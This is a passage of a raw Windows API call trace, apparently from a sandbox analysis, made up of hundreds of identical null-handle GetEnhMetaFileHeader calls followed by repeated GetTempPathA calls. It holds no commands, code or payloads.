[0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.551] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.552] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.553] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.554] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.574] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) 